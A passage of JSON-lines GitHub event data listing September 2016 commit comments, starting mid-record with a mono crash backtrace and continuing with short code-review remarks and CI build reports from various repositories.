mono`mini_cleanup(domain=0x00007fc6b140b2e0) + 721 at mini-runtime.c:4017\r\n    frame #14: 0x00000001093ce60b mono`mono_main(argc=<unavailable>, argv=<unavailable>) + 8139 at driver.c:2119\r\n    frame #15: 0x0000000109347064 mono`main [inlined] mono_main_with_options(argc=7, argc=7, argc=7, argv=0x00007fff568b9ad8, argv=0x00007fff568b9ad8, argv=0x00007fff568b9ad8) + 17 at main.c:28\r\n    frame #16: 0x0000000109347053 mono`main(argc=7, argv=0x00007fff568b9ad8) + 1155 at main.c:177\r\n    frame #17: 0x00007fff90c045fd libdyld.dylib`start + 1\r\n    frame #18: 0x00007fff90c045fd libdyld.dylib`start + 1\r\n\r\n  thread #2: tid = 0x8824c1, 0x00007fff906bb716 libsystem_kernel.dylib`__psynch_cvwait + 10\r\n    frame #0: 0x00007fff906bb716 libsystem_kernel.dylib`__psynch_cvwait + 10\r\n    frame #1: 0x00007fff8a6cfc3b libsystem_pthread.dylib`_pthread_cond_wait + 727\r\n    frame #2: 0x000000010957ba41 mono`thread_func [inlined] mono_os_cond_wait(mutex=0x00000001096af2b0) + 15 at mono-os-mutex.h:105\r\n    frame #3: 0x000000010957ba32 mono`thread_func(thread_data=0x0000000000000000) + 178 at sgen-thread-pool.c:118\r\n    frame #4: 0x00007fff8a6cd899 libsystem_pthread.dylib`_pthread_body + 138\r\n    frame #5: 0x00007fff8a6cd72a libsystem_pthread.dylib`_pthread_start + 137\r\n    frame #6: 0x00007fff8a6d1fc9 libsystem_pthread.dylib`thread_start + 13\r\n\r\n  thread #3: tid = 0x8824c5, 0x00007fff906bc662 libsystem_kernel.dylib`kevent64 + 10, queue = 'com.apple.libdispatch-manager'\r\n    frame #0: 0x00007fff906bc662 libsystem_kernel.dylib`kevent64 + 10\r\n    frame #1: 0x00007fff8859e421 libdispatch.dylib`_dispatch_mgr_invoke + 239\r\n    frame #2: 0x00007fff8859e136 libdispatch.dylib`_dispatch_mgr_thread + 52\r\n(lldb) detach\r\n(lldb) quit\r\nProcess 60673 detached\r\n\r\n=================================================================\r\nGot a SIGABRT while executing native code. This usually indicates\r\na fatal error in the mono runtime or one of the native libraries \r\nused by your application.\r\n=================================================================\r\n\r\nAbort trap: 6\r\nYues-iMac:GCModeller_3 Yue$ \r\n```"}},"created_at":"2016-09-24T05:14:04Z"}
{"id":"4611975642","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19156617,"position":null,"line":null,"path":null,"commit_id":"ca16ac6550e5a6b6ba1a8fdeb9c813d360469638","created_at":"2016-09-24T05:14:08Z","updated_at":"2016-09-24T05:14:08Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/ca16ac6550e5a6b6ba1a8fdeb9c813d360469638#commitcomment-19156188) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/04ae92172cce1990be9fa18f338a2babd0443307/daily_2016_9_24/report.md). cc @jrevels"}},"created_at":"2016-09-24T05:14:08Z"}
{"id":"4611977211","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19156622,"position":37,"line":37,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-24T05:15:36Z","updated_at":"2016-09-24T05:15:36Z","body":"Лучше в сервисе не заниматься выводом нотификаций об ошибках, а возвращать деферед реджект."}},"created_at":"2016-09-24T05:15:36Z"}
{"id":"4611977408","type":"CommitCommentEvent","actor":{"login":"carolflynn0"},"repo":{"name":"jennyd/govuk-local-interactions"},"payload":{"comment":{"id":19156625,"position":1418,"line":1418,"path":"authorities.json","commit_id":"dbb3c3d7c906961c5f8db448c5dc420d0c578499","created_at":"2016-09-24T05:15:49Z","updated_at":"2016-09-24T05:15:49Z","body":"S"}},"created_at":"2016-09-24T05:15:49Z"}
{"id":"4611977974","type":"CommitCommentEvent","actor":{"login":"carolflynn0"},"repo":{"name":"jennyd/govuk-local-interactions"},"payload":{"comment":{"id":19156629,"position":1433,"line":1433,"path":"authorities.json","commit_id":"dbb3c3d7c906961c5f8db448c5dc420d0c578499","created_at":"2016-09-24T05:16:25Z","updated_at":"2016-09-24T05:16:25Z","body":"Sal"}},"created_at":"2016-09-24T05:16:25Z"}
{"id":"4611978148","type":"CommitCommentEvent","actor":{"login":"midopa"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":19156631,"position":4,"line":24,"path":"plugins/maven/maven-server-api/src/org/jetbrains/idea/maven/model/MavenConstants.java","commit_id":"a2c139bc61f57d167c7ce4918dbc32a1295a5788","created_at":"2016-09-24T05:16:35Z","updated_at":"2016-09-24T05:16:35Z","body":"\"pom.yaml\" is also a valid YAML filename: http://www.yaml.org/faq.html"}},"created_at":"2016-09-24T05:16:35Z"}
{"id":"4611978332","type":"CommitCommentEvent","actor":{"login":"bloveless"},"repo":{"name":"anomalylabs/files-module"},"payload":{"comment":{"id":19156632,"position":null,"line":null,"path":null,"commit_id":"0a52933cadbe0bd86db5349b8544169cce5ef1d2","created_at":"2016-09-24T05:16:44Z","updated_at":"2016-09-24T05:16:44Z","body":"Looks good to me!"}},"created_at":"2016-09-24T05:16:44Z"}
{"id":"4611978468","type":"CommitCommentEvent","actor":{"login":"karthik-shanmugam"},"repo":{"name":"pioneers/PieCentral"},"payload":{"comment":{"id":19156634,"position":null,"line":null,"path":null,"commit_id":"3f53b917b22bb8e46c60c786048f1852c76b1540","created_at":"2016-09-24T05:16:50Z","updated_at":"2016-09-24T05:16:50Z","body":"Why was only the ready command moved, but not the other ones? (reset, add, hello, get, set)"}},"created_at":"2016-09-24T05:16:50Z"}
{"id":"4611982041","type":"CommitCommentEvent","actor":{"login":"sen1ove"},"repo":{"name":"sen1ove/test"},"payload":{"comment":{"id":19156645,"position":null,"line":null,"path":null,"commit_id":"989dbc0846061fd9142ec08c4606bfec31b1b1d2","created_at":"2016-09-24T05:19:48Z","updated_at":"2016-09-24T05:19:48Z","body":"HelloWorld!"}},"created_at":"2016-09-24T05:19:48Z"}
{"id":"4611983497","type":"CommitCommentEvent","actor":{"login":"thebriz24"},"repo":{"name":"CJPoll/exorcist"},"payload":{"comment":{"id":19156654,"position":26,"line":26,"path":"src/character.py","commit_id":"117723a890f20c2d03799930adcbd4981f899ca8","created_at":"2016-09-24T05:21:05Z","updated_at":"2016-09-24T05:21:05Z","body":"Maybe for readability rename parameter \"xp\" to \"xp_increase.\""}},"created_at":"2016-09-24T05:21:05Z"}
{"id":"4611984246","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19156660,"position":null,"line":null,"path":null,"commit_id":"cc91e024f924b22acb47d37e45014a30d93c8f59","created_at":"2016-09-24T05:21:47Z","updated_at":"2016-09-24T05:21:47Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [In-Game Collision-box Editor](https://trello.com/c/HQBF1SBM/86-in-game-collision-box-editor)"}},"created_at":"2016-09-24T05:21:47Z"}
{"id":"4611985792","type":"CommitCommentEvent","actor":{"login":"CJPoll"},"repo":{"name":"CJPoll/exorcist"},"payload":{"comment":{"id":19156668,"position":26,"line":26,"path":"src/character.py","commit_id":"117723a890f20c2d03799930adcbd4981f899ca8","created_at":"2016-09-24T05:23:32Z","updated_at":"2016-09-24T05:23:32Z","body":"Oh yeah - that makes perfect sense."}},"created_at":"2016-09-24T05:23:32Z"}
{"id":"4611986767","type":"CommitCommentEvent","actor":{"login":"thebriz24"},"repo":{"name":"CJPoll/exorcist"},"payload":{"comment":{"id":19156670,"position":22,"line":22,"path":"tests/test_character.py","commit_id":"117723a890f20c2d03799930adcbd4981f899ca8","created_at":"2016-09-24T05:24:36Z","updated_at":"2016-09-24T05:24:36Z","body":"test_decrease_stat"}},"created_at":"2016-09-24T05:24:36Z"}
{"id":"4611986869","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"samuraitruong/necro_socket"},"payload":{"comment":{"id":19156671,"position":null,"line":null,"path":null,"commit_id":"54650bc92cf714d5d063bdd550158a97c2a20e83","created_at":"2016-09-24T05:24:43Z","updated_at":"2016-09-24T05:24:43Z","body":":+1: "}},"created_at":"2016-09-24T05:24:43Z"}
{"id":"4611987696","type":"CommitCommentEvent","actor":{"login":"thebriz24"},"repo":{"name":"CJPoll/exorcist"},"payload":{"comment":{"id":19156672,"position":null,"line":null,"path":null,"commit_id":"117723a890f20c2d03799930adcbd4981f899ca8","created_at":"2016-09-24T05:25:39Z","updated_at":"2016-09-24T05:25:39Z","body":"Good. Just left 2 inline comments"}},"created_at":"2016-09-24T05:25:39Z"}
{"id":"4611988064","type":"CommitCommentEvent","actor":{"login":"CJPoll"},"repo":{"name":"CJPoll/exorcist"},"payload":{"comment":{"id":19156675,"position":22,"line":22,"path":"tests/test_character.py","commit_id":"117723a890f20c2d03799930adcbd4981f899ca8","created_at":"2016-09-24T05:26:04Z","updated_at":"2016-09-24T05:26:04Z","body":"👍 Will do\r\n"}},"created_at":"2016-09-24T05:26:04Z"}
{"id":"4611988900","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19156678,"position":43,"line":135,"path":"src/Decompiler/Analysis/ExpressionPropagator.cs","commit_id":"9ddedd42fbce1846e3256affa9e0413fb9ae917f","created_at":"2016-09-24T05:26:53Z","updated_at":"2016-09-24T05:26:53Z","body":"This method is unused now and could be removed"}},"created_at":"2016-09-24T05:26:53Z"}
{"id":"4611993567","type":"CommitCommentEvent","actor":{"login":"bodiddles"},"repo":{"name":"pioneers/PieCentral"},"payload":{"comment":{"id":19156698,"position":null,"line":null,"path":null,"commit_id":"3f53b917b22bb8e46c60c786048f1852c76b1540","created_at":"2016-09-24T05:31:32Z","updated_at":"2016-09-24T05:31:32Z","body":"I assume we need additional commands/messages to talk to Hibike so are we adding more types of messages to runtime_config or sending those like regular messages in like lists? "}},"created_at":"2016-09-24T05:31:32Z"}
{"id":"4611994151","type":"CommitCommentEvent","actor":{"login":"GabrielSanchezC"},"repo":{"name":"GabrielSanchezC/test"},"payload":{"comment":{"id":19156701,"position":1,"line":1,"path":"index.html","commit_id":"c84d59e6de23a4254fb5919f58e4ca25c0581b46","created_at":"2016-09-24T05:32:10Z","updated_at":"2016-09-24T05:32:10Z","body":"Capo"}},"created_at":"2016-09-24T05:32:10Z"}
{"id":"4612000752","type":"CommitCommentEvent","actor":{"login":"mafru"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19156712,"position":8,"line":1618,"path":"templates/default/css/theme-gui.css","commit_id":"f03c879120184703b6fbf2984e1d30b0b921778c","created_at":"2016-09-24T05:38:51Z","updated_at":"2016-09-24T05:38:51Z","body":"На что влияет второй паддинг? Может его можно убрать как дублирующий? "}},"created_at":"2016-09-24T05:38:51Z"}
{"id":"4612001608","type":"CommitCommentEvent","actor":{"login":"thebriz24"},"repo":{"name":"CJPoll/exorcist"},"payload":{"comment":{"id":19156713,"position":null,"line":null,"path":null,"commit_id":"005d6ab6e5e5d13bdea05786fc559b725b96600a","created_at":"2016-09-24T05:39:42Z","updated_at":"2016-09-24T05:39:42Z","body":"👍"}},"created_at":"2016-09-24T05:39:42Z"}
{"id":"4612002609","type":"CommitCommentEvent","actor":{"login":"mitya57"},"repo":{"name":"waylan/Python-Markdown"},"payload":{"comment":{"id":19156714,"position":5,"line":67,"path":"tests/extensions/attr_list.html","commit_id":"5881ae5235de7e8d57703aa33f49ed5fe7b79fee","created_at":"2016-09-24T05:40:30Z","updated_at":"2016-09-24T05:40:30Z","body":"Do we have a behavior change here? Is the `=b` part intentionally dropped?"}},"created_at":"2016-09-24T05:40:30Z"}
{"id":"4612003078","type":"CommitCommentEvent","actor":{"login":"rahulBarahpuria"},"repo":{"name":"rahulBarahpuria/MyStore"},"payload":{"comment":{"id":19156715,"position":7,"line":7,"path":"index.html","commit_id":"a0f633c68decc20b80398f430386fdae11a2c0ee","created_at":"2016-09-24T05:40:52Z","updated_at":"2016-09-24T05:40:52Z","body":"you can add any js file as a renderer process."}},"created_at":"2016-09-24T05:40:52Z"}
{"id":"4612006072","type":"CommitCommentEvent","actor":{"login":"iwean"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19156719,"position":null,"line":null,"path":null,"commit_id":"d66d58a9d151ad0a8b0b91167930876a787e8493","created_at":"2016-09-24T05:43:23Z","updated_at":"2016-09-24T05:43:23Z","body":":smile: "}},"created_at":"2016-09-24T05:43:23Z"}
{"id":"4612006407","type":"CommitCommentEvent","actor":{"login":"varun-k2"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19156720,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-24T05:43:41Z","updated_at":"2016-09-24T05:43:41Z","body":"Hi @aslam558 ,\r\nLook for the below which decide the triggering event of plugin.\r\nvalidationEventTrigger: \"blur\",\r\nHere you have to add events like keyup keydown wherever you want plugin to validate the form.\r\nyou can also add this while initializing/attaching the plugin to form.\r\n"}},"created_at":"2016-09-24T05:43:41Z"}
{"id":"4612011318","type":"CommitCommentEvent","actor":{"login":"rahulBarahpuria"},"repo":{"name":"rahulBarahpuria/MyStore"},"payload":{"comment":{"id":19156737,"position":14,"line":14,"path":"main.js","commit_id":"a0f633c68decc20b80398f430386fdae11a2c0ee","created_at":"2016-09-24T05:48:22Z","updated_at":"2016-09-24T05:48:22Z","body":"You can choose your own path"}},"created_at":"2016-09-24T05:48:22Z"}
{"id":"4612011965","type":"CommitCommentEvent","actor":{"login":"Snaacky"},"repo":{"name":"Snaacky/TheStickofCheat"},"payload":{"comment":{"id":19156739,"position":null,"line":null,"path":null,"commit_id":"c6634d6c1ab7dcace1418b6b64f4c2c5171f4eb8","created_at":"2016-09-24T05:49:03Z","updated_at":"2016-09-24T05:49:03Z","body":"Fuck licenses. Do whatever you want with this shit, homie."}},"created_at":"2016-09-24T05:49:03Z"}
{"id":"4612012315","type":"CommitCommentEvent","actor":{"login":"ApekshaNayak"},"repo":{"name":"ApekshaNayak/CourseraWebDev"},"payload":{"comment":{"id":19156741,"position":null,"line":null,"path":null,"commit_id":"ff308c8348e864711a8017639def946d5547bef3","created_at":"2016-09-24T05:49:27Z","updated_at":"2016-09-24T05:49:27Z","body":"a new web page for module 2 assignment\r\n"}},"created_at":"2016-09-24T05:49:27Z"}
{"id":"4612013101","type":"CommitCommentEvent","actor":{"login":"xens0117"},"repo":{"name":"dwander/Prime-Kernel"},"payload":{"comment":{"id":19156744,"position":17,"line":1129,"path":"kernel/sched/core.c","commit_id":"eb326518709844d5121dba975ea10ba940f8e22d","created_at":"2016-09-24T05:50:14Z","updated_at":"2016-09-24T05:50:14Z","body":"CPU relax 관련 커밋을 DQ님 깃에서 처음 접했기 때문에 andreilux 커밋과 diff 떠보다가 발견했습니다. 아마 누락된것 같네요ㅎㅎ 이 패치를 타 기종 커널에 적용시켜봤는데 벤치 점수 저하나 체감상의 렉이 생기는것 같지는 않습니다. \r\n네이버 메일을 사용하지 않으시는것 같은데 혹시 가능하시다면 주로 사용하시는 메일 주소를 남겨주시면 감사하겠습니다 :) (카페는 비공개이고, 질문이나 개발 소식을 접할 수 있는 방법이 깃허브 외에는 없어서요...)"}},"created_at":"2016-09-24T05:50:14Z"}
{"id":"4612013134","type":"CommitCommentEvent","actor":{"login":"yizow"},"repo":{"name":"pioneers/PieCentral"},"payload":{"comment":{"id":19156745,"position":null,"line":null,"path":null,"commit_id":"3f53b917b22bb8e46c60c786048f1852c76b1540","created_at":"2016-09-24T05:50:16Z","updated_at":"2016-09-24T05:50:16Z","body":"This pull request is intended to be completely independent of things like hibike. These changes are something I feel is a minor change that makes the code better.\r\n\r\nThe commands in SM_COMMANDS are ones we use for communication to stateManager.\r\nRUNTIME_CONFIG holds various runtime configuration options\r\n\r\nThe READY command was removed because \r\na) it wasn't really a command, perse\r\nb) Is a signal we send to external applications (like hibike) that are expecting some previously agreed upon object. Like a string \"ready\". This String is a configurable option of runtime. \r\n\r\nI plan on defining Hibike specific message types in a separate enum. \r\nMore details on my plans are in the google doc i linked to on slack. "}},"created_at":"2016-09-24T05:50:16Z"}
{"id":"4612014298","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156747,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T05:51:29Z","updated_at":"2016-09-24T05:51:29Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-24T05:51:29Z"}
{"id":"4612015038","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156748,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T05:52:10Z","updated_at":"2016-09-24T05:52:10Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2379 of 2379 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-24T05:52:10Z"}
{"id":"4612015278","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156751,"position":null,"line":null,"path":null,"commit_id":"0e914aa27f8a22058be58e5d9ad1800df7792708","created_at":"2016-09-24T05:52:23Z","updated_at":"2016-09-24T05:52:23Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0e914aa27f8a22058be58e5d9ad1800df7792708-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T05:52:23Z"}
{"id":"4612017429","type":"CommitCommentEvent","actor":{"login":"robertoti"},"repo":{"name":"robertoti/welocar"},"payload":{"comment":{"id":19156760,"position":null,"line":null,"path":null,"commit_id":"0871311c3d8a342b87148a6aec71467d3cb67ca4","created_at":"2016-09-24T05:54:30Z","updated_at":"2016-09-24T05:54:30Z","body":"Ta Serto!"}},"created_at":"2016-09-24T05:54:30Z"}
{"id":"4612019410","type":"CommitCommentEvent","actor":{"login":"phucthai123"},"repo":{"name":"phucthai1234/bai1"},"payload":{"comment":{"id":19156765,"position":null,"line":null,"path":null,"commit_id":"7705fdc2abf642fd2c2c9626adfcc3b7c6aff125","created_at":"2016-09-24T05:56:22Z","updated_at":"2016-09-24T05:56:22Z","body":"kaka"}},"created_at":"2016-09-24T05:56:22Z"}
{"id":"4612019489","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156766,"position":null,"line":null,"path":null,"commit_id":"222ee920199edfc1ffad9e39e09bdcacb90fac78","created_at":"2016-09-24T05:56:27Z","updated_at":"2016-09-24T05:56:27Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-222ee920199edfc1ffad9e39e09bdcacb90fac78-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T05:56:27Z"}
{"id":"4612023985","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19156794,"position":13,"line":20,"path":"lib/node_modules/@stdlib/datasets/us-states-abbr/README.md","commit_id":"8640bf4bc4342dfb1dfc5d9080720e5c323f23e2","created_at":"2016-09-24T06:00:31Z","updated_at":"2016-09-24T06:00:31Z","body":"Instead of `console.log( data );` could just use the `/* returns` annotation at line `20`."}},"created_at":"2016-09-24T06:00:31Z"}
{"id":"4612025830","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19156822,"position":13,"line":20,"path":"lib/node_modules/@stdlib/datasets/us-states-capitals/README.md","commit_id":"2bb5f9e9e93263c42b2388818f94b676b700a6cc","created_at":"2016-09-24T06:02:09Z","updated_at":"2016-09-24T06:02:09Z","body":"Could use `/* returns` style annotation at line `20`."}},"created_at":"2016-09-24T06:02:09Z"}
{"id":"4612029128","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/nitro"},"payload":{"comment":{"id":19156830,"position":2,"line":2,"path":"README.md","commit_id":"6890befd996f084dd5f3df6bf257f82dd272f2ff","created_at":"2016-09-24T06:05:18Z","updated_at":"2016-09-24T06:05:18Z","body":"C://netsh"}},"created_at":"2016-09-24T06:05:18Z"}
{"id":"4612030179","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"sbcgua/abapGit"},"payload":{"comment":{"id":19156832,"position":null,"line":null,"path":null,"commit_id":"9ccff2690f6ad1c26f4d0e36510304991d238c3f","created_at":"2016-09-24T06:06:10Z","updated_at":"2016-09-24T06:06:10Z","body":"yeah, cool"}},"created_at":"2016-09-24T06:06:10Z"}
{"id":"4612031330","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19156834,"position":null,"line":null,"path":null,"commit_id":"d394cf210e392fd5e433cb9a89495641f3acaccc","created_at":"2016-09-24T06:07:05Z","updated_at":"2016-09-24T06:07:05Z","body":"Good luck!"}},"created_at":"2016-09-24T06:07:05Z"}
{"id":"4612031333","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/nitro"},"payload":{"comment":{"id":19156835,"position":1,"line":1,"path":"README.md","commit_id":"6890befd996f084dd5f3df6bf257f82dd272f2ff","created_at":"2016-09-24T06:07:05Z","updated_at":"2016-09-24T06:07:05Z","body":"137clc"}},"created_at":"2016-09-24T06:07:05Z"}
{"id":"4612031519","type":"CommitCommentEvent","actor":{"login":"pb00067"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19156837,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-24T06:07:14Z","updated_at":"2016-09-24T06:07:14Z","body":"Thanks for good wishes! [Here ](http://tests.stockfishchess.org/tests/view/57e60ffc0ebc59763f358dad) we go LTC with a further speed-improved version (same bench)."}},"created_at":"2016-09-24T06:07:14Z"}
{"id":"4612032033","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/nitro"},"payload":{"comment":{"id":19156838,"position":null,"line":null,"path":null,"commit_id":"6890befd996f084dd5f3df6bf257f82dd272f2ff","created_at":"2016-09-24T06:07:37Z","updated_at":"2016-09-24T06:07:37Z","body":"<137clc>"}},"created_at":"2016-09-24T06:07:37Z"}
{"id":"4612032420","type":"CommitCommentEvent","actor":{"login":"rainplus"},"repo":{"name":"Mr-Dai/Friend-Tracker-Backend"},"payload":{"comment":{"id":19156839,"position":null,"line":null,"path":null,"commit_id":"576c6cb00fc68751d289797c4a499f44126f6ace","created_at":"2016-09-24T06:07:56Z","updated_at":"2016-09-24T06:07:56Z","body":"hey,guy,use it for what?"}},"created_at":"2016-09-24T06:07:56Z"}
{"id":"4612035898","type":"CommitCommentEvent","actor":{"login":"mkresin"},"repo":{"name":"xdarklight/mktplinkfw3"},"payload":{"comment":{"id":19156851,"position":null,"line":null,"path":null,"commit_id":"be60f7470c133db2953653924e1e1cba1f0c0ced","created_at":"2016-09-24T06:10:28Z","updated_at":"2016-09-24T06:10:28Z","body":"\n> ok, so the public key needs to be extracted from lib/libcmm.so in order to run script that will extract the signature from tplink image.\n> \nI've extracted the public key already from the binary. Its the BgIAAACkAABSU0ExAAQAAAEAAQD54... string.\n\n> once extracted, is this signature or any part of it further used when creating a signature with a private key? (this key should be unique, or i could generate one?)\n> \nThe public key can be only used to verify the signature. To create a valid signature the matching private key from tp-link is required. But this private key is still unknown.\n"}},"created_at":"2016-09-24T06:10:28Z"}
{"id":"4612036972","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19156854,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-24T06:11:13Z","updated_at":"2016-09-24T06:11:13Z","body":"Спасибо."}},"created_at":"2016-09-24T06:11:13Z"}
{"id":"4612037562","type":"CommitCommentEvent","actor":{"login":"ochaperdana"},"repo":{"name":"ochaperdana/AdvancedWidget1"},"payload":{"comment":{"id":19156856,"position":9,"line":9,"path":"README.md","commit_id":"097317fccfa3d73b9ca5de50621c07798b830f65","created_at":"2016-09-24T06:11:37Z","updated_at":"2016-09-24T06:11:37Z","body":"<h1>Link Aplikasi</h1>\r\nhttps://docs.google.com/uc?id=0B09XALl5QufvaU9mOWpHN1p6Nzg"}},"created_at":"2016-09-24T06:11:37Z"}
{"id":"4612038920","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19156860,"position":13,"line":20,"path":"lib/node_modules/@stdlib/datasets/us-states-abbr/README.md","commit_id":"8640bf4bc4342dfb1dfc5d9080720e5c323f23e2","created_at":"2016-09-24T06:12:39Z","updated_at":"2016-09-24T06:12:39Z","body":"Makes sense. Also, what about using a fcn name such as `getAbbreviations` instead of `abbr`?"}},"created_at":"2016-09-24T06:12:39Z"}
{"id":"4612039439","type":"CommitCommentEvent","actor":{"login":"ochaperdana"},"repo":{"name":"ochaperdana/AdvancedWidget1"},"payload":{"comment":{"id":19156861,"position":9,"line":9,"path":"README.md","commit_id":"097317fccfa3d73b9ca5de50621c07798b830f65","created_at":"2016-09-24T06:13:04Z","updated_at":"2016-09-24T06:13:04Z","body":"<h1>Link Aplikasi</h1>\r\nhttps://docs.google.com/uc?id=0B09XALl5QufvaU9mOWpHN1p6Nzg"}},"created_at":"2016-09-24T06:13:04Z"}
{"id":"4612039556","type":"CommitCommentEvent","actor":{"login":"Wedge009"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19156863,"position":18,"line":223,"path":"src/editor/map/map_context.cpp","commit_id":"c29ea4e2612fd919bb48ae25ebb2f01fccbc3231","created_at":"2016-09-24T06:13:10Z","updated_at":"2016-09-24T06:13:10Z","body":"I had a bit of dig into team.hpp/cpp and ran it through both a normal game and the editor. It does indeed look like side is _supposed_ to be 1-based, but I think the editor is initialising all side numbers to 0 and instead of correctly assigning the side number. So it looks like running into an error here is a symptom rather than a cause."}},"created_at":"2016-09-24T06:13:10Z"}
{"id":"4612041580","type":"CommitCommentEvent","actor":{"login":"chanmank"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19156866,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-24T06:14:46Z","updated_at":"2016-09-24T06:14:46Z","body":"/.\\ 又被封了.........還想下載潛行 1080P的...."}},"created_at":"2016-09-24T06:14:46Z"}
{"id":"4612042358","type":"CommitCommentEvent","actor":{"login":"vampyklauz"},"repo":{"name":"vampyklauz/trade_data"},"payload":{"comment":{"id":19156870,"position":null,"line":null,"path":null,"commit_id":"548c39d8f1f095042fb72d8f63e5857dfceaa11a","created_at":"2016-09-24T06:15:23Z","updated_at":"2016-09-24T06:15:23Z","body":"remove"}},"created_at":"2016-09-24T06:15:23Z"}
